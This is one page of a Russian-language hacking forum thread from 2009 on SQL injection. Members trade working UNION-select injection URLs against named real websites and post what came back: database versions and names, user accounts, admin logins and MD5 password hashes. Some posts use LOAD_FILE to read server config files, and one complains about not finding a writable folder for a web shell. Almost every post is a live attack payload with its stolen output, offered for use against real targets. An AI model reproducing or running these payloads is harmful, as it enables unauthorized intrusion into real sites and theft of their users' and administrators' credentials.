SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 488 of 798
  1. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    4ветка.....тут картон есть....вообщем наздоровье
     
    #9741 ReduKToR, 10 Jun 2009
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.vents-spb.ru/products/decor/index.php?cat_id=-234+union+select+1,2,concat_ws(0x3a3a,database(),version()),4,5,6,7,8+from+mysql.user+/*+&item_id=713
    sotern::4.1.22

    http://www.bosch-home.com.ua/page.php?item_id=-55'+union+select+1,2,LOAD_FILE(0x2F7573722F7777772F6273682F68746D6C2F696E6465782E706870),4,5,6,7,8,9+from+mysql.user+/*+

    http://www.siemens-pt.com.ua/?item_id=-3'+union+select+1,2,LOAD_FILE(0x2F7573722F7777772F6273682F68746D6C2F636F6E6669672E706870),4,5,6,7,8,9+from+mysql.user+/*+
    PS папку куда можно залить шелл ненашёл((
     
    #9742 DezMond™, 10 Jun 2009
    1 person likes this.
  3. ReduKToR

    ReduKToR Active Member

    Joined:
    5 Jan 2009
    Messages:
    257
    Likes Received:
    179
    Reputations:
    4
    Ну вот еще одна итка
     
    #9743 ReduKToR, 10 Jun 2009
    Last edited: 10 Jun 2009
    1 person likes this.
  4. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Київський завод "Росинка"

    http://www.rosinka.ua/detnews.php?id=-82/**/UNION/**/SELECT/**/111111111111

    Database Version: 4.1.22
    Database name: rosinka
    User name: u_rosinka@localhost
     
    #9744 Rubaka, 10 Jun 2009
  5. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.superkrovlia.ru/files/popup.php?id=-51+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+/*+
    vms60_skov

    http://www.vniikp.ru/info_page.phtml?item_id=-2108+union+select+concat_ws(0x3a3a,login,password),2,3,4,5,6+from+admins+--+
    admin::202cb962ac59075b964b07152d234b70 - 123

    http://www.ipk-shop.ru/index.php?menu_id=12&type_id=52&subtype_id=1084&item_id=-46236+union+select+1,2,3,4,database(),6,7,8,9,10,11,12,13+from+mysql.user+--+&step=2'
    ipkshop

    http://www.mgr-n.ru/base.php?tipsd=2&o=1'&variant=-1+union+select+1,2,3,4,5,6,database(),8+/*+
    mgr_n_db
     
    #9745 DezMond™, 10 Jun 2009
  6. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    version 5.0.67-community
    user gshaber_gshaber@localhost
    database gshaber_gshaber


    table of users
    columns
    and

    haber 0530e22dea41e24a039563139cdc215e
     
    #9746 erihtoney, 10 Jun 2009
    2 people like this.
  7. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    Strategic Evacuation Systems Corp

    http://sescorp.us/article.php?sid=13+UNION+SELECT+1,2,3,4,5,@@version,7,8,9,10,11+++LIMIT+1,1/*

    version()=4.1.20

    стоят фильтры
     
    #9747 Rubaka, 10 Jun 2009
  8. +++AndreyDevil+++

    +++AndreyDevil+++ Member

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    http://www.kasparov.ru/subject.php?id=-74'+union+select+1/*

    --------------------------------------------------------

    Database Version: 5.0.22-log
    User name: [email protected]
    Database name:kasparov_main_v3


    forum админ

    --- gek : valentina ---

    ---------------------------------------------------------
     
    #9748 +++AndreyDevil+++, 10 Jun 2009
    3 people like this.
  9. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR4, ТИЦ 60
    http://www.artosgroup.ru/super.php?id=141+and+substring(version(),1,1)=4
     
    #9749 AlexSatter, 10 Jun 2009
  10. +++AndreyDevil+++

    +++AndreyDevil+++ Member

    Joined:
    28 Dec 2008
    Messages:
    117
    Likes Received:
    30
    Reputations:
    0
    Page Rank: 9

    http://www.indiana.edu/~jofr/review.php?id=822+and+substring(version(),1,1)=3

    я в расстройстве.....
     
    #9750 +++AndreyDevil+++, 10 Jun 2009
    2 people like this.
  11. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR 6
    http://www.cfe.ru/eng/news/?nid=25+and+substring(version(),1,1)=3/*

    ----

    PR2, ТИЦ 20
    http://geshe.ru/news.php?nid=125+union+select+1,2,3,4,5,6,7,8,concat_Ws(0x3a,version(),user(),database())
    5.0.41-community-log:[email protected]:kammal_geshe
     
    #9751 AlexSatter, 10 Jun 2009
    Last edited: 10 Jun 2009
    1 person likes this.
  12. SkyLine32

    SkyLine32 Member

    Joined:
    1 Mar 2009
    Messages:
    144
    Likes Received:
    22
    Reputations:
    2
    PR 4
    Database Version: 4.1.22
    Database name: vrijeschool2
    User name: [email protected]

    PR 6
    Database Version: 4.1.22
    Database name: sitemaker
    User name: profkom@localhost
     
    #9752 SkyLine32, 11 Jun 2009
    1 person likes this.
  13. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://www.velozavod.com/window.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57
    [email protected]:u23645_velozavod:5.0.67-log
     
    #9753 mailbrush, 11 Jun 2009
    1 person likes this.
  14. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    wholefoodsmarket.com pr 7
    inj:
    Code:
    http://www.wholefoodsmarket.com/recipes/recipe.php?recipeId=-2547'
    Данные БД:
    Code:
    Database Version: 5.0.77-log
Database name: wfm_recipes
User name: [email protected]
    Таблица users 190к записей
    Code:
    http://www.wholefoodsmarket.com/recipes/recipe.php?recipeId=-2547 UNION SELECT+1,concat_ws(0x1,uid,name,email,password,pwrkey),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 FROM wfm_myrecipes.users limit 190000,1--
     
    #9754 MaSTeR GэN, 11 Jun 2009
    1 person likes this.
  15. f1rebl00d

    f1rebl00d Elder - Старейшина

    Joined:
    27 Dec 2006
    Messages:
    25
    Likes Received:
    34
    Reputations:
    15
    Code:
    http://prager.com/sales/index.php?id=104'+and+substring(version(),1,1)=3+--+
    version: 3.23.58-log
    database: prager
    user: basic_user@localhost
     
    #9755 f1rebl00d, 11 Jun 2009
  16. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    Сайт:

    http://cod5zombies.com/

    Версия:

    http://cod5zombies.com/dl.php?id=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

    Таблицы:
    http://cod5zombies.com/dl.php?id=-3+union+select+1,2,3,unhex(hex(table_name)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+INFORMATION_SCHEMA.TABLES--


    e107_users
    http://cod5zombies.com/dl.php?id=-3+union+select+1,unhex(hex(column_name)),3,4,5,6,7,%208,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=0x653130375f75736572--
    Логин:Пасс в md5

    http://cod5zombies.com/dl.php?id=-3+union+select+1,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+e107_user--

    Огромное спасибо R1dex :)
     
    #9756 SeNaP, 11 Jun 2009
    Last edited: 11 Jun 2009
  17. RulleR

    RulleR Elder - Старейшина

    Joined:
    12 Jun 2008
    Messages:
    166
    Likes Received:
    439
    Reputations:
    313
    [PR 4]
    Code:
    http://www.noswizard.com/product_desc.php?id=-101+union+select+1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52
    4.1.22-standard-log:noswizards:noswizards@localhost

    [PR 1]
    Code:
    http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
    5.0.77-community:cancuncl_classcancun:cancuncl_clcunmx@localhost
    Code:
    http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.tables
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns+where+table_name=0x6672656574706c62616e6e6572735f61646d696e
http://www.cancunclassifiedads.com/product_desc.php?id=-130+union+select+1,2,concat_ws(0x3a,id,admin_name,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+freetplbanners_admin
    id:admin_name:pwd
    [PR 0]
    Code:
    http://sodager.com/product_desc.php?id=9999999+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
    5.0.51a-log:sodager:[email protected]
    Code:
    http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.tables
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,group_concat(column_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+information_schema.columns+where+table_name=0x7362636c61737369666965645f61646d696e
http://sodager.com/product_desc.php?id=9999999+union+select+1,2,concat_ws(0x3a,id,admin_name,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+sbclassified_admin
    id:admin_name:pwd
     
    #9757 RulleR, 11 Jun 2009
    1 person likes this.
  18. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    303
    Likes Received:
    92
    Reputations:
    33
    PR4
    http://www.sonorika.com/v2/people/pop.php?Id=-8513+union+select+1,concat_ws(0x3a,version(),user(),database()),3
    5.1.31-log:[email protected]
     
    #9758 AlexSatter, 11 Jun 2009
  19. Dimionx

    Dimionx Elder - Старейшина

    Joined:
    28 Aug 2008
    Messages:
    37
    Likes Received:
    12
    Reputations:
    4
    www.imperialeg.com

    Code:
    http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x0b,version(),user(),database()),11,12,13,14,15,16,17,18,19

    Версия - 5.0.77-community
    Юзер - palmacom_user@localhost
    БД - palmacom_db

    Табличка admin:

    Code:
    http://www.imperialeg.com/russian/page.php?pg=project_details&project_id=18+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x0b,id,username,password),11,12,13,14,15,16,17,18,19+from+admin
    Code:
    admin 
89a99c4142817128be9eb8e7c8966592
    Админка:
    Code:
    http://www.imperialeg.com/admin/
Username - admin
Password - (нужно расшифровать 89a99c4142817128be9eb8e7c8966592)
     
    #9759 Dimionx, 11 Jun 2009
  20. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    224
    Likes Received:
    105
    Reputations:
    25
    rivnepost@localhost
    4.1.22
    rivnepostdb
     
    #9760 udman, 11 Jun 2009
(You must log in or sign up to post here.)
Page 488 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.